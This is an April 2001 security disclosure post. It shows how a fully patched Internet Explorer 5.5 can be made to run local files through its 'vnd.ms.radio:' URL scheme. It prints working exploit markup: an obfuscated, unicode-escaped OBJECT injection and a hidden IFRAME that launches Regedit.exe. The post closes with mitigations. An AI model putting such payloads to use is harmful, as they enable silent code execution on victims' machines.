Sunday, April 1, 2001 Default installation of Internet Explorer 5.5 with all of its so-called patches, service "packs" etc, still allows us to execute files on default installations of the target computer: Once Again: We cobble together new and old Components as follows : - 1. Courtesy of Georgi Guninski (http://www.securityfocus.com/bid/1978) 2. Courtesy of Dildog (http://www.securityfocus.com/bid/1394) 3. vnd.ms.radio:http://www.malware.com/ Internet Explorer 5.5 has a "neat" built-in radio system. An oft touted wonder feature. This incredible feature enjoys its own url scheme, the so-called "vnd.ms.radio:". What we then do is take our Georgi Guninski <object data="" type="text/html"> and point it to our so-called "vnd.ms.radio:" *.url. But first we create yet another html page comprising our generic object courtesy of Dildog and point that to the file we wish to execute. Specifically: Component 1 document.writeln('\u003c\u004f\u0042\u004a\u0045\u0043\u0054\u0020\u0044\u0041\u0054\u0041\u003d\u0022\u0043\u003a\u005c\u0057\u0049\u004e\u0044\u004f\u0057\u0053\u005c\u0054\u0045\u004d\u0050\u005c\u0072\u0061\u0064\u0069\u006f\u002e\u0075\u0072\u006c\u0022\u0020\u0054\u0059\u0050\u0045\u003d\u0022\u0074\u0065\u0078\u0074\u002f\u0068\u0074\u006d\u006c\u0022\u0020\u0057\u0049\u 0044\u0054\u0048\u003d\u0032\u0030\u0030\u0020\u0048\u0045\u0049\u0047\u0048\u0054\u003d\u0032\u0030\u0030\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u004f\u0042\u004a\u0045\u0043\u0054\u003e'); Component 2 <IFRAME SRC="vnd.ms.radio:http://www.malware.com/infosec/US-eng/drivel/hahaha?<BODY><OBJECT CLASSID='CLSID:10000000-0000-0000-0000-000000000000' CODEBASE='C:\WINDOWS\Regedit.exe'></OBJECT> </BODY></HTML>" WIDTH=100 HEIGHT=100 STYLE="DISPLAY:NONE"></IFRAME> What happens is our so-called "vnd.ms.radio:" url is called, but because there is no 'real' audio file to play, it creates a named file in our'C:\WINDOWS\TEMP, we include in the so-called "vnd.ms.radio:" url our code to execute our file. We then call our so-called "vnd.ms.radio:" *.url through our Component 1 which parses it as html and in turn, being outside the so-called "Security Zones" fires our generic object which then executes! our file: Working Example: [note: tested on default installation of win98 and default installation of IE5.5 both patched to the hilt] http://www.malware.com/drivel.html Notes: 1. Again, default installs of both Os and IE5.5 (both fully patched as of today's date) 2. Unable to include external code at this time. No time. No interest. 3. Monster 1.5Meg patch dated August 09, 2000 does absolutely nothing (http://www.microsoft.com/technet/security/bulletin/MS00-055.asp) 4. Disable ActiveX and Scripting and relocate the temp folder. --- http://www.malware.com _______________________________________________________ Send a cool gift with your E-Card http://www.bluemountain.com/giftcenter/
